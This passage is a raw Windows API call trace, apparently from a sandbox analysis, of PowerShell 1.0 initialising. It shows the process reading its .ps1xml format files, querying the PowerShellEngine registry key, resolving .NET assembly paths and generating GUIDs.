lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0135.264] SetErrorMode (uMode=0x1) returned 0x1 [0135.264] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" 
(normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccfe0 | out: lpFileInformation=0xccfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0135.264] SetErrorMode (uMode=0x1) returned 0x1 [0135.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0135.264] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd0c8 | out: phkResult=0xcd0c8*=0x308) returned 0x0 [0135.264] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd04c, lpData=0x0, lpcbData=0xcd048*=0x0 | out: lpType=0xcd04c*=0x1, lpData=0x0, lpcbData=0xcd048*=0x56) returned 0x0 [0135.265] CoTaskMemAlloc (cb=0x5a) returned 0x1b80a900 [0135.265] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd01c, lpData=0x1b80a900, lpcbData=0xcd018*=0x56 | out: lpType=0xcd01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd018*=0x56) returned 0x0 [0135.265] CoTaskMemFree (pv=0x1b80a900) [0135.265] RegCloseKey (hKey=0x308) returned 0x0 [0135.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0135.265] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0135.267] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x9ee64383, Data2=0xf7e, Data3=0x49dd, Data4=([0]=0x8b, [1]=0x3e, [2]=0xae, [3]=0x56, [4]=0x9a, [5]=0xda, [6]=0xc0, [7]=0x5c))) returned 0x0 [0135.272] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xfd3fbe41, Data2=0xa305, Data3=0x47ce, Data4=([0]=0x89, [1]=0x5f, [2]=0x36, [3]=0xfa, [4]=0xe2, [5]=0x76, [6]=0x8, [7]=0xb1))) returned 0x0 [0135.275] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x94fba808, Data2=0x65f9, Data3=0x4b18, Data4=([0]=0x82, [1]=0x3c, [2]=0x62, [3]=0xf9, [4]=0xdc, [5]=0x3f, [6]=0x26, [7]=0x81))) returned 0x0 [0135.276] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x6bc45aa0, Data2=0x8ad9, Data3=0x490d, Data4=([0]=0x9d, [1]=0xe7, [2]=0x4a, [3]=0x2a, [4]=0xf0, [5]=0xfd, [6]=0x51, [7]=0x3f))) returned 0x0 [0135.276] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x4cfe2878, Data2=0x479, Data3=0x41e0, Data4=([0]=0xb9, [1]=0xd4, [2]=0x87, [3]=0xba, [4]=0x6c, [5]=0xf2, [6]=0x9f, [7]=0x27))) returned 0x0 [0135.276] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x6892f476, Data2=0x3ba4, Data3=0x4d05, Data4=([0]=0xb9, [1]=0x13, [2]=0xad, [3]=0x19, [4]=0x6d, [5]=0x72, [6]=0x14, [7]=0x82))) returned 0x0 [0135.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.276] SetErrorMode (uMode=0x1) returned 0x1 [0135.277] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: 
"c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308 [0135.277] GetFileType (hFile=0x308) returned 0x1 [0135.277] SetErrorMode (uMode=0x1) returned 0x1 [0135.277] GetFileType (hFile=0x308) returned 0x1 [0135.277] ReadFile (in: hFile=0x308, lpBuffer=0x3320100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x3320100*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.281] ReadFile (in: hFile=0x308, lpBuffer=0x3320100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x3320100*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.281] ReadFile (in: hFile=0x308, lpBuffer=0x3320100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x3320100*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.282] ReadFile (in: hFile=0x308, lpBuffer=0x3320100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x3320100*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.282] ReadFile (in: hFile=0x308, lpBuffer=0x3320100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x3320100*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.283] ReadFile (in: hFile=0x308, lpBuffer=0x3320100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x3320100*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.283] ReadFile (in: hFile=0x308, lpBuffer=0x3320100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x3320100*, lpNumberOfBytesRead=0xcd038*=0xaca, lpOverlapped=0x0) returned 1 [0135.283] ReadFile 
(in: hFile=0x308, lpBuffer=0x331f732, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x331f732*, lpNumberOfBytesRead=0xcd038*=0x0, lpOverlapped=0x0) returned 1 [0135.283] ReadFile (in: hFile=0x308, lpBuffer=0x3320100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x3320100*, lpNumberOfBytesRead=0xcd038*=0x0, lpOverlapped=0x0) returned 1 [0135.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.283] SetErrorMode (uMode=0x1) returned 0x1 [0135.284] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccfe0 | out: lpFileInformation=0xccfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0135.284] SetErrorMode (uMode=0x1) returned 0x1 [0135.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.284] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd0c8 | out: phkResult=0xcd0c8*=0x308) returned 0x0 [0135.284] RegQueryValueExW (in: 
hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd04c, lpData=0x0, lpcbData=0xcd048*=0x0 | out: lpType=0xcd04c*=0x1, lpData=0x0, lpcbData=0xcd048*=0x56) returned 0x0 [0135.284] CoTaskMemAlloc (cb=0x5a) returned 0x1b80a900 [0135.284] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd01c, lpData=0x1b80a900, lpcbData=0xcd018*=0x56 | out: lpType=0xcd01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd018*=0x56) returned 0x0 [0135.284] CoTaskMemFree (pv=0x1b80a900) [0135.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c [0135.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, 
lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0135.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0135.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0135.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0135.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0135.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0135.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0135.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0135.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0135.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0135.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0135.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0135.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c [0135.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0135.333] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.397] VirtualQuery (in: lpAddress=0xcbb60, 
lpBuffer=0xcca20, dwLength=0x30 | out: lpBuffer=0xcca20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.398] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xc4220ead, Data2=0x63f5, Data3=0x4186, Data4=([0]=0xb0, [1]=0x6e, [2]=0x80, [3]=0x31, [4]=0xd4, [5]=0xa3, [6]=0xf7, [7]=0x2d))) returned 0x0 [0135.399] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x87eeaec4, Data2=0xcc9c, Data3=0x49b6, Data4=([0]=0xa8, [1]=0x16, [2]=0x12, [3]=0xb3, [4]=0x6, [5]=0x89, [6]=0x43, [7]=0x18))) returned 0x0 [0135.400] VirtualQuery (in: lpAddress=0xcbd10, lpBuffer=0xccbd0, dwLength=0x30 | out: lpBuffer=0xccbd0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.401] VirtualQuery (in: lpAddress=0xcbd10, lpBuffer=0xccbd0, dwLength=0x30 | out: lpBuffer=0xccbd0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.402] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xff0bc38f, Data2=0x1905, Data3=0x4b3d, Data4=([0]=0x8d, [1]=0xb, [2]=0x9a, [3]=0x21, [4]=0x2f, [5]=0x3, [6]=0xb8, [7]=0x98))) returned 0x0 [0135.414] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xe02a6171, Data2=0xc492, Data3=0x4783, Data4=([0]=0x85, [1]=0x68, [2]=0x5a, [3]=0xc, [4]=0x84, [5]=0x43, [6]=0x1b, [7]=0x32))) returned 0x0 [0135.415] VirtualQuery (in: lpAddress=0xcbf60, lpBuffer=0xcce20, dwLength=0x30 | out: lpBuffer=0xcce20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.416] VirtualQuery (in: lpAddress=0xcbca0, 
lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.416] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.416] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x7ffb0a72, Data2=0xca52, Data3=0x4600, Data4=([0]=0x82, [1]=0x6, [2]=0x9a, [3]=0x2a, [4]=0x4a, [5]=0xdb, [6]=0x3a, [7]=0xfc))) returned 0x0 [0135.417] VirtualQuery (in: lpAddress=0xcbf60, lpBuffer=0xcce20, dwLength=0x30 | out: lpBuffer=0xcce20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.417] VirtualQuery (in: lpAddress=0xcbd80, lpBuffer=0xccc40, dwLength=0x30 | out: lpBuffer=0xccc40*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.417] VirtualQuery (in: lpAddress=0xcb5d0, lpBuffer=0xcc490, dwLength=0x30 | out: lpBuffer=0xcc490*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.418] VirtualQuery (in: lpAddress=0xcb5d0, lpBuffer=0xcc490, dwLength=0x30 | out: lpBuffer=0xcc490*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.418] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x60a2b333, Data2=0xc80f, Data3=0x4342, Data4=([0]=0x8e, 
[1]=0xa5, [2]=0x60, [3]=0xa0, [4]=0xc0, [5]=0x73, [6]=0xce, [7]=0xc5))) returned 0x0 [0135.419] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x42269648, Data2=0x7689, Data3=0x4485, Data4=([0]=0xa1, [1]=0xde, [2]=0x34, [3]=0xb5, [4]=0x68, [5]=0x29, [6]=0x2f, [7]=0x16))) returned 0x0 [0135.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.419] SetErrorMode (uMode=0x1) returned 0x1 [0135.419] SetErrorMode (uMode=0x1) returned 0x1 [0135.419] GetFileType (hFile=0x308) returned 0x1 [0135.420] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.428] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.431] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.431] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.432] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.432] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, 
